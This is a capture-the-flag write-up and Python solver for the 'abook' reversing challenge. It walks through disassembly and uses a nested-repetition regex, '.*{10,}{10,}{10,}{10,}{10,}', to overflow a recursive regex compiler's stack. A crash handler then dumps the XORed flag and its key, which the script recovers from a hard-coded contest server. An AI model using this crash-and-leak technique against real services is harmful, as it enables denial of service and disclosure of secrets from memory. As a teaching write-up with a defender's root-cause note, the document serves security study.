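''' abook - (re200) SIGINT

We are given an ELF x64 binary that acts as a contact book, but before the main
functionality it reads 32 bytes from /dev/urandom, copies them to another buffer,
then XORs the last buffer with the admin flag given as a parameter:

.text:0000000000400C56 loc_400C56:                             ; CODE XREF: main+28j
.text:0000000000400C56                 mov     esi, offset modes ; "r"
.text:0000000000400C5B                 mov     edi, offset filename ; "/dev/urandom"
.text:0000000000400C60                 call    _fopen
.text:0000000000400C65                 mov     esi, 1          ; size
.text:0000000000400C6A                 mov     rcx, rax        ; stream
.text:0000000000400C6D                 mov     rbp, rax
.text:0000000000400C70                 mov     edx, 20h        ; n
.text:0000000000400C75                 mov     edi, offset xor_key ; ptr
.text:0000000000400C7A                 call    _fread
.text:0000000000400C7F                 mov     rdi, rbp        ; stream
.text:0000000000400C82                 call    _fclose
.text:0000000000400C87                 mov     eax, offset secret_key
.text:0000000000400C8C                 mov     esi, offset xor_key
.text:0000000000400C91                 mov     ecx, 8
.text:0000000000400C96                 mov     rdi, rax
.text:0000000000400C99                 xor     eax, eax
.text:0000000000400C9B                 rep movsd
.text:0000000000400C9D
.text:0000000000400C9D loc_400C9D:                             ; CODE XREF: main+A7j
.text:0000000000400C9D                 mov     rdx, [rbx+8]    ; argv[1]
.text:0000000000400CA1                 movzx   edx, byte ptr [rdx+rax]
.text:0000000000400CA5                 test    dl, dl
.text:0000000000400CA7                 jz      short loc_400CB9
.text:0000000000400CA9                 xor     ds:secret_key[rax], dl
.text:0000000000400CAF                 add     rax, 1
.text:0000000000400CB3                 cmp     rax, 20h
.text:0000000000400CB7                 jnz     short loc_400C9D

It also sets up a custom stack for signals and intercepts SIGSEGV, SIGABRT and
SIGBUS. What is important: the alternate stack begins right before xor_key and
secret_key.

.text:0000000000400CB9 set_signals:                            ; CODE XREF: main+97j
.text:0000000000400CB9                 movzx   eax, cs:xor_end
.text:0000000000400CC0                 xor     esi, esi        ; oss
.text:0000000000400CC2                 mov     rdi, rsp        ; ss
.text:0000000000400CC5                 mov     [rsp+1148h+var_1148], offset stack_base
.text:0000000000400CCD                 mov     [rsp+1148h+var_1138], 2000h
.text:0000000000400CD6                 mov     ebx, offset comands
.text:0000000000400CDB                 mov     [rsp+1148h+var_1140], 0
.text:0000000000400CE3                 mov     cs:sc_end, al
.text:0000000000400CE9                 call    _sigaltstack
.text:0000000000400CEE                 lea     rdi, [rsp+1148h+set] ; set
.text:0000000000400CF3                 mov     [rsp+1148h+act], offset debug
.text:0000000000400CFC                 mov     [rsp+1148h+var_1050], 8000004h
.text:0000000000400D07                 call    _sigfillset
.text:0000000000400D0C                 lea     rsi, [rsp+1148h+act] ; act
.text:0000000000400D11                 xor     edx, edx        ; oact
.text:0000000000400D13                 mov     edi, SIGSEGV    ; sig
.text:0000000000400D18                 call    _sigaction
.text:0000000000400D1D                 lea     rsi, [rsp+1148h+act] ; act
.text:0000000000400D22                 xor     edx, edx        ; oact
.text:0000000000400D24                 mov     edi, SIGABRT    ; sig
.text:0000000000400D29                 call    _sigaction
.text:0000000000400D2E                 lea     rsi, [rsp+1148h+act] ; act
.text:0000000000400D33                 xor     edx, edx        ; oact
.text:0000000000400D35                 mov     edi, SIGBUS     ; sig
.text:0000000000400D3A                 call    _sigaction

The debug routine dumps stack frames and registers, and the first stack frame
points exactly at secret_key. So what we have to do is crash the application ;]

Digging through the code we can find that the search command accepts a regexp
and fires it to find corresponding records - we can use it! We can prepare a
nasty recursive regex like this:

    .*{10,}{10,}{10,}{10,}{10,}

Since the implementation of regcomp is recursive it will fire itself up so many
times it eventually exhausts the stack, triggering SIGSEGV, and we land in the
custom signal handler. All we need to do is read the first frame, XOR the two
blocks together and enjoy the flag.

Root cause, for the defender: the crash handler writes raw memory (including
key material placed right next to the alternate signal stack) to the client,
and the regex compiler recurses on attacker-controlled input with no depth
bound. Either one alone would have been survivable.

flag: SIGINT_DO_NOT_CRASH_ME_PLEASE!!

-- mak
'''
import binascii
import socket

HOST = '188.40.147.114'
PORT = 1024
# One command line: the nested bounds make the service's recursive regcomp()
# blow its stack, which routes execution into the memory-dumping signal handler.
PAYLOAD = b'search .*{10,}{10,}{10,}{10,}{10,}\n'
KEY_LEN = 32  # both secret_key and xor_key are 0x20 bytes (see the fread above)


def recover_flag(raw):
    """Rebuild the flag from the crash handler's output.

    ``raw`` is everything the service sent back after the crash, as bytes.
    Lines that contain a space are taken to be hex-dump lines; their hex digits
    are concatenated and decoded. The first 32 decoded bytes are ``secret_key``
    (the flag already XORed with the random key) and the next 32 are
    ``xor_key``; XORing them byte-wise gives the flag back.

    Returns the flag as bytes.
    Raises ValueError when the dump is not valid hex or yields fewer than 64
    bytes - the original one-liner would silently print a truncated flag.
    """
    # Keep only lines that look like "aa bb cc ..."; header/register lines
    # without spaces are dropped.
    dump_lines = [line for line in raw.splitlines() if b' ' in line]
    hex_text = b''.join(dump_lines).replace(b' ', b'')
    try:
        data = binascii.unhexlify(hex_text)
    except (TypeError, ValueError) as exc:  # TypeError on py2, binascii.Error on py3
        raise ValueError('dump is not valid hex: %s' % exc)
    if len(data) < 2 * KEY_LEN:
        raise ValueError('dump too short: got %d bytes, need %d'
                         % (len(data), 2 * KEY_LEN))
    secret = bytearray(data[:KEY_LEN])
    xkey = bytearray(data[KEY_LEN:2 * KEY_LEN])
    return bytes(bytearray(s ^ k for s, k in zip(secret, xkey)))


def _read_until_close(sock):
    """Read from ``sock`` until the peer closes; returns the collected bytes."""
    chunks = []
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            return b''.join(chunks)
        chunks.append(chunk)


def main():
    """Connect to the service, trigger the crash and print the recovered flag.

    A plain TCP socket replaces telnetlib: the service speaks no telnet
    negotiation, and telnetlib is deprecated and removed in Python 3.13.
    Like the original ``read_all()``, this blocks until the remote side closes
    the connection after the crash dump.
    """
    conn = socket.create_connection((HOST, PORT))
    try:
        conn.sendall(PAYLOAD)
        dump = _read_until_close(conn)
    finally:
        conn.close()
    print(recover_flag(dump).decode('latin-1'))


if __name__ == '__main__':
    main()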